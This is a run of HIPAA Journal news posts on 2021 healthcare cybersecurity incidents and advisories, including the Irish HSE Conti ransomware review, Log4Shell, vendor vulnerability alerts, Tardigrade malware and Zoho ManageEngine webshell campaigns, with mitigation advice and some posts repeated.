Healthcare Cybersecurity

Learnings from a Major Healthcare Ransomware Attack

Posted by HIPAA Journal

One of the most serious healthcare ransomware attacks occurred in Ireland earlier this year. The Health Service Executive (HSE), the Republic of Ireland’s national health system, suffered a major attack that resulted in Conti ransomware being deployed and forced its National Healthcare Network to be taken offline. That meant healthcare professionals across the country were prevented from accessing all HSE IT systems, including clinical care systems, patient records, laboratory systems, payroll, and other clinical and non-clinical systems which caused major disruption to healthcare services across the country.

Following the attack, the HSE Board commissioned PricewaterhouseCoopers (PWC) to conduct an independent post-incident review into the attack to establish the facts related to technical and operational preparedness and the circumstances that allowed the attackers to gain access to its systems, exfiltrate sensitive data, encrypt files, and extort the HSE.

Cybersecurity Failures that are Common in the Healthcare Industry

PWC’s recently published report highlights a number of security failures that allowed HSE systems to be infiltrated. While the report is specific to the HSE cyberattack, its findings are applicable to many healthcare organizations in the United States that have similar unaddressed vulnerabilities and a lack of preparedness for ransomware attacks. The recommendations made by PWC can be used to strengthen defenses to prevent similar attacks from occurring.

While the HSE ransomware attack affected a huge number of IT systems, it started with a phishing email. An employee was sent an email with a malicious Microsoft Excel spreadsheet as an attachment on March 16, 2021. When the attachment was opened, malware was installed on the device. The HSE workstation had antivirus software installed, which could have detected the malicious file and prevented the malware infection; however, the virus definition list had not been updated for over a year, which rendered the protection near to non-existent.

From that single infected device, the attacker was able to move laterally within the network, compromise several accounts with high-level privileges, gain access to large numbers of servers, and exfiltrate data ‘undetected’.  On May 14, 2021, 8 weeks after the initial compromise, Conti ransomware was extensively deployed and encrypted files. The HSE detected the encryption and shut down the National Health Network to contain the attack, which prevented healthcare professionals across the country from accessing applications and essential data.

During the 8 weeks that its systems were compromised, suspicious activity was detected on more than one occasion which should have triggered an investigation into a potential security breach, but those alerts were not acted upon. Had they been investigated the deployment of ransomware could have been prevented and potentially also the exfiltration of sensitive data.

Simple Techniques Used to Devastating Effect

According to PWC, the attacker was able to use well-known and simple attack techniques to move around the network, identify and exfiltrate sensitive data, and deploy Conti ransomware over large parts of the IT network with relative ease. The attack could have been far worse. The attacker could have targeted medical devices, destroyed data at scale, used auto-propagation mechanisms such as those used in the WannaCry ransomware attacks, and could also have targeted cloud systems.

The HSE made it clear that it would not be paying the ransom. On May 20, 2021, 6 days after the HSE shut down all HSE IT system access to contain the attack, the attackers released the keys to decrypt data. Had it not been for a strong response to the attack and the release of the decryption keys the implications could have been much more severe. Even with the keys to decrypt data it took until September 21, 2021, for the HSE to successfully decrypt all of its servers and restore around 99% of its applications. The HSE estimated the cost of the attack could rise to half a billion Euros.

Ireland’s Largest Employer Had No CISO

PWC said the attack was possible due to a low level of cybersecurity maturity, weak IT systems and controls, and staffing issues.  PWC said there was a lack of cybersecurity leadership, as there was no individual in the HSE responsible for providing leadership and direction of its cybersecurity efforts, which is very unusual for an organization with the size and complexity of the HSE. The HSE is Ireland’s largest employer and had over 130,000 staff members and more than 70,000 devices at the time of the attack, but the HSE only employed 1,519 staff in cybersecurity roles. PWC said employees with responsibility for cybersecurity did not have the necessary skills to perform the tasks expected of them and the HSE should have had a Chief Information Security Officer (CISO) with overall responsibility for cybersecurity.

Lack of Monitoring and Insufficient Cybersecurity Controls

The HSE did not have the capability to effectively monitor and respond to security alerts across its entire network, patching was sluggish and updates were not applied quickly across the IT systems connected to the National Health Network. The HSE was also reliant on a single anti-malware solution which was not being monitored or effectively maintained across its entire IT environment. The HSE also continued to use legacy systems with known security issues and remains heavily reliant on Windows 7.

“The HSE is operating on a frail IT estate that has lacked the investment over many years required to maintain a secure, resilient, modern IT infrastructure. It does not possess the required cybersecurity capabilities to protect the operation of the health services and the data they process, from the cyber attacks that all organizations face today,” concluded PWC. “It does not have sufficient subject matter expertise, resources, or appropriate security tooling to detect, prevent or respond to a cyber attack of this scale. There were several missed opportunities to detect malicious activity, prior to the detonation phase of the ransomware.”

Similar vulnerabilities in people, processes, and technology can be found in many health systems around the world, and the PWC recommendations can be applied beyond the HSE to improve cybersecurity and make it harder for attacks such as this to succeed.

The PWC report, recommendations, and learnings from the incident can be found here (PDF).

The post Learnings from a Major Healthcare Ransomware Attack appeared first on HIPAA Journal.

Max-Severity Apache Log4j Zero-day Vulnerability Extensively Exploited in the Wild

Posted by HIPAA Journal

A maximum-severity vulnerability has been identified in Apache Log4j, an open-source Java-based logging library used by many thousands of organizations in their enterprise applications and by many cloud services.

The vulnerability, dubbed Log4Shell and tracked as CVE-2021-44228, is serious as they come, with some security researchers claiming the flaw is the most serious to be discovered in the past decade due to its ease of exploitation and the sheer number of enterprise applications and cloud services that are affected.

The vulnerability can be exploited without authentication to achieve remote code execution and take full control of vulnerable systems. The vulnerability affects Apache Log4j between versions 2.0 to 2.14.1, and has been fixed in version 2.15.0.

The advice is to ensure the upgrade is performed immediately as a proof-of-concept exploit for the flaw is in the public domain, extensive scans are being performed for vulnerable systems, and there have been many cases of the flaw being exploited in the wild. Some reports suggest the improper input validation bug has been exploited in the wild for some time before it was discovered by researchers at Alibaba Cloud on November 24.

The vulnerability was first detected being exploited against Minecraft, which still uses Java, although many web apps and business applications use Java and are vulnerable to attack and the vulnerability affects multiple Apache frameworks such as Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, and others.

The vulnerability can be exploited by manipulating log messages to execute arbitrary code from LDAP servers when message lookup substitution is enabled. This is a Java deserialization issue due to the library making network requests through the Java Naming and Directory Interface (JNDI) to an LDAP server and executing code that’s returned. By manipulating the log messages to trigger a look-up to an attacker-controlled server, an attacker can execute code on the victim’s system. Exploiting the bug requires the attacker to get a vulnerable application to log a special string, which is trivial for threat actors and requires a single line of code.

According to UK security researcher Marcus Hutchins, threat actors attacked Minecraft servers by simply pasting a short message into the chatbox. The bug is known to have been exploited to deploy cryptocurrency miners, to install botnet code on IoT devices, and initial access brokers have been scrambling to exploit the code, so it is inevitable that it will provide the initial access to allow ransomware attacks.

“I cannot overstate the seriousness of this threat. On the face of it, this is aimed at cryptominers but we believe this creates just the sort of background noise that serious threat actors will try to exploit in order to attack a whole range of high-value targets such as banks, state security, and critical infrastructure,” explained Lotem Finkelstein, director of threat intelligence and research at Check Point.

If it is not possible to immediately update to version 2.15.0, there are mitigations that can prevent exploitation in version 2.10.0 and later. A vulnerability “vaccine” has been released by Cybereason that can be used to protect against exploitation by using the vulnerability to run code that changes the settings to prevent further exploitation. The vaccine could be used to gain some time, although the best option is to update to the latest Apache Log4j version.

The vulnerable code could be anywhere, so fixing the issue is not likely to be straightforward, although Huntress has released a tool that can be used to check if applications are affected – available here.

Mitigations that can be applied if the update cannot be easily performed have been released by Apache. “In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.”

Since there have been many cases of the flaw being exploited, it is important to not only fix the vulnerability but to also assume the flaw has already been exploited and to check logs for any unusual activity after systems and applications have been secured.

The post Max-Severity Apache Log4j Zero-day Vulnerability Extensively Exploited in the Wild appeared first on HIPAA Journal.

Max-Severity Apache Log4j Zero-day Vulnerability Extensively Exploited in the Wild

Posted by HIPAA Journal

A maximum-severity vulnerability has been identified in Apache Log4j, an open-source Java-based logging library used by many thousands of organizations in their enterprise applications and by many cloud services.

The vulnerability, dubbed Log4Shell and tracked as CVE-2021-44228, is serious as they come, with some security researchers claiming the flaw is the most serious to be discovered in the past decade due to its ease of exploitation and the sheer number of enterprise applications and cloud services that are affected.

The vulnerability can be exploited without authentication to achieve remote code execution and take full control of vulnerable systems. The vulnerability affects Apache Log4j between versions 2.0 to 2.14.1, and has been fixed in version 2.15.0.

The advice is to ensure the upgrade is performed immediately as a proof-of-concept exploit for the flaw is in the public domain, extensive scans are being performed for vulnerable systems, and there have been many cases of the flaw being exploited in the wild. Some reports suggest the improper input validation bug has been exploited in the wild for some time before it was discovered by researchers at Alibaba Cloud on November 24.

The vulnerability was first detected being exploited against Minecraft, which still uses Java, although many web apps and business applications use Java and are vulnerable to attack and the vulnerability affects multiple Apache frameworks such as Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, and others.

The vulnerability can be exploited by manipulating log messages to execute arbitrary code from LDAP servers when message lookup substitution is enabled. This is a Java deserialization issue due to the library making network requests through the Java Naming and Directory Interface (JNDI) to an LDAP server and executing code that’s returned. By manipulating the log messages to trigger a look-up to an attacker-controlled server, an attacker can execute code on the victim’s system. Exploiting the bug requires the attacker to get a vulnerable application to log a special string, which is trivial for threat actors and requires a single line of code.

According to UK security researcher Marcus Hutchins, threat actors attacked Minecraft servers by simply pasting a short message into the chatbox. The bug is known to have been exploited to deploy cryptocurrency miners, to install botnet code on IoT devices, and initial access brokers have been scrambling to exploit the code, so it is inevitable that it will provide the initial access to allow ransomware attacks.

“I cannot overstate the seriousness of this threat. On the face of it, this is aimed at cryptominers but we believe this creates just the sort of background noise that serious threat actors will try to exploit in order to attack a whole range of high-value targets such as banks, state security, and critical infrastructure,” explained Lotem Finkelstein, director of threat intelligence and research at Check Point.

If it is not possible to immediately update to version 2.15.0, there are mitigations that can prevent exploitation in version 2.10.0 and later. A vulnerability “vaccine” has been released by Cybereason that can be used to protect against exploitation by using the vulnerability to run code that changes the settings to prevent further exploitation. The vaccine could be used to gain some time, although the best option is to update to the latest Apache Log4j version.

The vulnerable code could be anywhere, so fixing the issue is not likely to be straightforward, although Huntress has released a tool that can be used to check if applications are affected – available here.

Mitigations that can be applied if the update cannot be easily performed have been released by Apache. “In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.”

Since there have been many cases of the flaw being exploited, it is important to not only fix the vulnerability but to also assume the flaw has already been exploited and to check logs for any unusual activity after systems and applications have been secured.

The post Max-Severity Apache Log4j Zero-day Vulnerability Extensively Exploited in the Wild appeared first on HIPAA Journal.

High-Severity Authentication Bug Identified in Hillrom Welch Allyn Cardio Products

Posted by HIPAA Journal

A high severity vulnerability has been identified in certain Hillrom Welch Allyn Cardio products that allows accounts to be accessed without a password.

The vulnerability is an authentication bypass issue that exists when the Hillrom cardiology products have been configured to use single sign-on (SSO). The vulnerability allows the manual entry of all active directory (AD) accounts provisioned within the application, and access will be granted without having to provide the associated password. That means a remote attacker could access the application under the provided AD account and gain all privileges associated with the account.

The vulnerability is tracked as CVE-2021-43935 and has been assigned a CVSS v3 base score of 8.1 out of 10.

According to Hillrom, the vulnerability affects the following Hillrom Welch Allyn cardiology products:

  • Welch Allyn Q-Stress Cardiac Stress Testing System: Versions 6.0.0 through 6.3.1
  • Welch Allyn X-Scribe Cardiac Stress Testing System: Versions 5.01 through 6.3.1
  • Welch Allyn Diagnostic Cardiology Suite: Version 2.1.0
  • Welch Allyn Vision Express: Versions 6.1.0 through 6.4.0
  • Welch Allyn H-Scribe Holter Analysis System: Versions 5.01 through 6.4.0
  • Welch Allyn R-Scribe Resting ECG System: Versions 5.01 through 7.0.0
  • Welch Allyn Connex Cardio: Versions 1.0.0 through 1.1.1

Hillrom will address this vulnerability in the next software release; however, as an interim measure to prevent the vulnerability from being exploited, users of the affected products should disable the SSO feature in the respective Modality Manager Configuration settings. In addition, customers should ensure they apply proper network and physical security controls and should apply authentication for server access.

The post High-Severity Authentication Bug Identified in Hillrom Welch Allyn Cardio Products appeared first on HIPAA Journal.

SonicWall Recommends Immediate Firmware Upgrade to Fix Critical Flaws in SMA 100 Series Appliances

Posted by HIPAA Journal

SonicWall has released new firmware for its Secure Mobile Access (SMA) 100 series remote access appliances that fixes 8 vulnerabilities including 2 critical and 4 high-severity flaws.

Vulnerabilities in SonicWall appliances are attractive to threat actors and have been targeted in the past in ransomware attacks. While there are currently no known cases of the latest batch of vulnerabilities being exploited in the wild, there is a high risk of these vulnerabilities being exploited if the firmware is not updated promptly. SMA 100 series appliances include the SonicWall SMA 200, 210, 400, 410, and 500v secure access gateway products, all of which are affected.

The most serious vulnerabilities are buffer overflow issues which could be exploited remotely by an unauthenticated attacker to execute code on vulnerable appliances. These are CVE-2021-20038, an unauthenticated stack-based buffer overflow vulnerability (CVSS score of 9.8), and CVE-2021-20045, which covers multiple unauthenticated file explorer heap-based and stack-based buffer overflow issues (CVSS score 9.4). A further heap-based buffer overflow vulnerability – CVE-2021-20043 – allows remote code execution, although an attacker would need to be authenticated (CVSS score 8.8).

The remaining 3 high-severity vulnerabilities are CVE-2021-20041 – an unauthenticated CPU exhaustion vulnerability (CVSS score 7.5); CVE-2021-20039 – an authenticated command injection vulnerability (CVSS score 7.2); and CVE-2021-20044 – a post-authentication remote code execution vulnerability (CVSS score 7.2).

Two medium-severity vulnerabilities have also been fixed: CVE-2021-20040 – an unauthenticated file upload path traversal vulnerability (CVSS score 6.5) and CVE-2021-20042 – an unauthenticated ‘confused deputy’ vulnerability (CVSS score 6.3).

The firmware update can be accessed at MySonicWall.com and should be applied as soon as possible to prevent exploitation. SonicWall says there are no temporary mitigations that can be implemented to prevent exploitation of the flaws.

The post SonicWall Recommends Immediate Firmware Upgrade to Fix Critical Flaws in SMA 100 Series Appliances appeared first on HIPAA Journal.

Guidance Issued for Healthcare CISOs on Identity, Interoperability, and Patient Access

Posted by HIPAA Journal

The Health Information Sharing and Analysis Center (Health-ISAC) has released guidance for Chief Information Security Officers (CISOs) on adopting an identity-centric approach to enabling secure and easy access to patient data to meet the interoperability, patient access, and data sharing requirements of the 21st Century Cures Act.

New federal regulations tied to the 21st Century Cures Act call for healthcare organizations to provide patients with easy access to their healthcare data and ensure patients can easily share their electronic health information (EHI) data wherever, whenever, and with whomever they want. The failure of a healthcare organization to implement systems to support patient access and interoperability could be considered information blocking and would be subject to fines and penalties.

The new federal requirements are for healthcare providers and insurers to allow data sharing through Application Programming Interfaces (APIs) that operate on the Fast Healthcare Interoperability and Resources (FHIR) standard. Healthcare providers and insurers are required to establish APIs to allow patients to access their EHI; however, providing patients with easy access to their healthcare data has the potential to introduce security vulnerabilities.

Health-ISAC says that in order to provide easy access to patient data, multiple privacy, security, and usability challenges need to be addressed, all of which are rooted in identity. When users request access to their data, strong authentication controls must be in place to verify that the person requesting EHI is who they say they are. For many years, patient matching problems have plagued the healthcare industry, and without a national patient identifier, those problems exist to this day. Those issues must also be addressed to ensure the correct EHI is provided.  Also, if an individual wants to only share part of their EHI, it needs to be possible for a portion of the data to be easily shared.

H-ISAC Framework for Managing Identity

Health-ISAC suggests a Framework for Managing Identity (above) that covers all of those functions; however, privacy and security issues also need to be addressed. For example, if a patient wants to authorize the use of EHI on behalf of someone else that he/she cares for, such as an elderly relative or a minor child, that must be possible. It must also be possible for a patient to delegate access privileges if they are being cared for by someone else, and for appropriate authentication controls to be in place to accommodate such requests. API-level security is also required. FHIR APIs are in the public domain, so they must be secured after authorization to use is granted.

Health-ISAC suggests that healthcare organizations should adopt an identity-centric approach to data sharing to solve these issues. “The most effective way of mitigating the risk that these issues pose to organizations is through the implementation of a modern, robust, and secure identity infrastructure that can securely authenticate and authorize users and incoming requests, enforce the appropriate consent requests, and tightly govern the use of identities,” said Health-ISAC. “By design, this is exactly what the Health-ISAC framework is meant to achieve.”

Additionally, Health-ISAC strongly recommends implementing multi-factor authentication, as while this is not explicitly required by the new ONC and CMS Rules, guidance issued by the government strongly points to the use of MFA. There are risks associated with not implementing MFA due to its importance for authentication.  The HHS’ Office for Civil Rights (OCR) has fined health organizations for HIPAA violations related to inadequate authentication in the past. Health-ISAC has produced a white paper – All About Authentication – which explains the best approach for implementing MFA.

“Identity is a journey. As the healthcare industry focuses on digital adoption, identity will continue to play a foundational role. Whether your implementation of a modern identity system is driven by regulatory and compliance requirements, security and privacy concerns, or a desire to improve customer experience, a well-architected, robust digital identity solution can address all of these drivers,” concludes Health-ISAC.

The post Guidance Issued for Healthcare CISOs on Identity, Interoperability, and Patient Access appeared first on HIPAA Journal.

Biomanufacturing Sector Warned of High Risk of Tardigrade Malware Attacks

Posted by HIPAA Journal

A highly sophisticated malware capable of aggressively spreading within networks is being used in targeted attacks on the biomanufacturing sector. The malware has been named Tardigrade by security researchers and initial research suggests it may be a variant of SmokeLoader – A commonly used malware loader and backdoor, although SmokeLoader and Tardigrade malware are quite distinct.

The sophisticated nature of the malware coupled with the targeted attacks on vaccine manufacturers and their partners strongly suggest the malware was developed and is being used by an Advanced Persisted Threat (APT) actor. The malware was first detected being used in attacks on the biomanufacturing sector in the spring of 2021 when an infection was discovered at a large U.S. biomanufacturing facility. The malware was identified again in an attack on a biomanufacturing firm in October 2021 and it is believed to have been used in attacks on several firms in the sector.

In contrast to SmokeLoader, which requires instructions to be sent to the malware from its command-and-control infrastructure, Tardigrade malware has far greater autonomy and can use its internal logic to make decisions about lateral movement and which files to modify. The malware has a distributed command-and-control network and uses a variety of IPs that do not correspond to a specific command-and-control node. The malware is also metamorphic, which means its code regularly changes while retaining its functionality. That means signature-based detection mechanisms are not effective at identifying and blocking Tardigrade malware.

Tardigrade malware is stealthy and can be used to gain persistent access to victims’ systems for espionage. The malware creates a tunnel for data exfiltration and has been used to prepare systems for further malicious activities such as ransomware attacks. The malware was first detected when investigating what appeared to be a ransomware attack.

An advisory about the malware was issued by the Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) due to the significant threat the malware poses to the biomanufacturing sector and their partners, with the HHS’ Health Sector Cybersecurity Coordination Center (HC3) also issuing a recent alert about the malware.

BIO-ISAC says all biomanufacturing sites and their partners should assume that they will be targets and should take steps to improve their defenses against this new malware threat. The primary method of malware delivery is believed to be phishing emails, although the malware is capable of spreading via USB drives and can propagate autonomously throughout victims’ networks.

It is important to ensure cybersecurity best practices are followed, such as closing open remote desktop protocols, updating out-of-date operating systems and software, aggressively segmenting networks, implementing multifactor authentication, and ensuring antivirus software is used on all devices that is capable of behavioral analysis.

BIO-ISAC also recommends conducting a “crown jewels” analysis, which should include assessing the impact of an attack should certain critical devices be rendered inoperable, ensuring offline backups are performed on biomanufacturing infrastructure, testing backups to ensure recovery is possible, providing phishing awareness training to the workforce, inquiring about lead times for procuring critical infrastructure components such as chromatography, endotoxin, and microbial containment systems, and accelerating the upgrade of legacy equipment.

Further information on the Tardigrade malware threat is available from BIO-ISAC and HC3.

The post Biomanufacturing Sector Warned of High Risk of Tardigrade Malware Attacks appeared first on HIPAA Journal.

APT Actor Exploiting Zoho ManageEngine ServiceDesk Plus to Deliver Webshells

Posted by HIPAA Journal

An APT actor that was targeting a vulnerability in the enterprise password management and single sign-on solution Zoho ManageEngine ADSelfService Plus has started exploiting another critical vulnerability in a different Zoho product, the IT helpdesk and asset management solution Zoho ManageEngine ServiceDesk Plus.

The APT group had been exploiting a critical vulnerability in ManageEngine ADSelfService Plus tracked as CVE-2021-40539, which affects Zoho ManageEngine ADSelfService Plus version 6113 and prior, and is a REST API authentication bypass that can be exploited to allow remote code execution.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory on December 2, 2021, about a different vulnerability being exploited by the APT actor. The vulnerability, CVE-2021-44077, affects all versions of Zoho ManageEngine ServiceDesk Plus prior to version 11306, ServiceDesk Plus MSP prior to version 10530, and SupportCenter Plus prior to version 11014. The vulnerability is related to RestAPI URLs in a servlet and ImportTechnicians in the Struts configuration. Successful exploitation of the flaw will allow remote code execution.

The alert warns that APT actors and other threat groups are believed to be exploiting the vulnerability to upload executable files and place webshells on vulnerable systems. The webshells allow a range of different post-exploitation activities such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.

Zoho released a security advisory and patch to correct the CVE-2021-44077 flaw on September 16, 2021, with a further alert issued on November 22, 2021, warning that the vulnerability was being exploited in the wild. The first know exploits of the vulnerability were used in late October 2021, prior to any proof-of-concept exploit being publicly released, indicating the exploit for the vulnerability was developed by the APT actor.

According to Palo Alto Networks, the APT actor has conducted three campaigns this year, first exploiting the CVE-2021-40539 in attacks on US ports and defense firms, the second exploited the same vulnerability on targets in a range of different sectors, including healthcare, with the latest campaign exploiting the CVE-2021-44077 vulnerability in attacks on the healthcare, education, technology, defense, finance, and entertainment sectors.

In the latest campaign, the APT actor exploits the flaw by sending two requests to the REST API, one uploads an executable file and the second launches the payload. The flaw can be exploited without authentication on vulnerable ServiceDesk servers and has been exploited to deliver a variant of the Godzilla webshell that is different from the variant used in the first two campaigns.

Palo Alto Networks has found evidence that suggests the attack may be conducted by the Chinese nation-state APT group tracked as APT 27/Emissary Panda, although the evidence is not sufficient to attribute the attacks to that group. The attacks have mostly been conducted in the United States, with a small number of attacks conducted on targets in India, Turkey, Russia, and the UK.

The FBI and CISA have shared technical details of the attacks, indicators of compromise, network indicators, and YARA rules in the security Alert AA21-336A.

The post APT Actor Exploiting Zoho ManageEngine ServiceDesk Plus to Deliver Webshells appeared first on HIPAA Journal.

APT Actor Exploiting Zoho ManageEngine ServiceDesk Plus to Deliver Webshells

Posted by HIPAA Journal

An APT actor that was targeting a vulnerability in the enterprise password management and single sign-on solution Zoho ManageEngine ADSelfService Plus has started exploiting another critical vulnerability in a different Zoho product, the IT helpdesk and asset management solution Zoho ManageEngine ServiceDesk Plus.

The APT group had been exploiting a critical vulnerability in ManageEngine ADSelfService Plus tracked as CVE-2021-40539, which affects Zoho ManageEngine ADSelfService Plus version 6113 and prior, and is a REST API authentication bypass that can be exploited to allow remote code execution.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory on December 2, 2021, about a different vulnerability being exploited by the APT actor. The vulnerability, CVE-2021-44077, affects all versions of Zoho ManageEngine ServiceDesk Plus prior to version 11306, ServiceDesk Plus MSP prior to version 10530, and SupportCenter Plus prior to version 11014. The vulnerability is related to RestAPI URLs in a servlet and ImportTechnicians in the Struts configuration. Successful exploitation of the flaw will allow remote code execution.

The alert warns that APT actors and other threat groups are believed to be exploiting the vulnerability to upload executable files and place webshells on vulnerable systems. The webshells allow a range of different post-exploitation activities such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.

Zoho released a security advisory and patch to correct the CVE-2021-44077 flaw on September 16, 2021, with a further alert issued on November 22, 2021, warning that the vulnerability was being exploited in the wild. The first know exploits of the vulnerability were used in late October 2021, prior to any proof-of-concept exploit being publicly released, indicating the exploit for the vulnerability was developed by the APT actor.

According to Palo Alto Networks, the APT actor has conducted three campaigns this year, first exploiting the CVE-2021-40539 in attacks on US ports and defense firms, the second exploited the same vulnerability on targets in a range of different sectors, including healthcare, with the latest campaign exploiting the CVE-2021-44077 vulnerability in attacks on the healthcare, education, technology, defense, finance, and entertainment sectors.

In the latest campaign, the APT actor exploits the flaw by sending two requests to the REST API, one uploads an executable file and the second launches the payload. The flaw can be exploited without authentication on vulnerable ServiceDesk servers and has been exploited to deliver a variant of the Godzilla webshell that is different from the variant used in the first two campaigns.

Palo Alto Networks has found evidence that suggests the attack may be conducted by the Chinese nation-state APT group tracked as APT 27/Emissary Panda, although the evidence is not sufficient to attribute the attacks to that group. The attacks have mostly been conducted in the United States, with a small number of attacks conducted on targets in India, Turkey, Russia, and the UK.

The FBI and CISA have shared technical details of the attacks, indicators of compromise, network indicators, and YARA rules in the security Alert AA21-336A.

The post APT Actor Exploiting Zoho ManageEngine ServiceDesk Plus to Deliver Webshells appeared first on HIPAA Journal.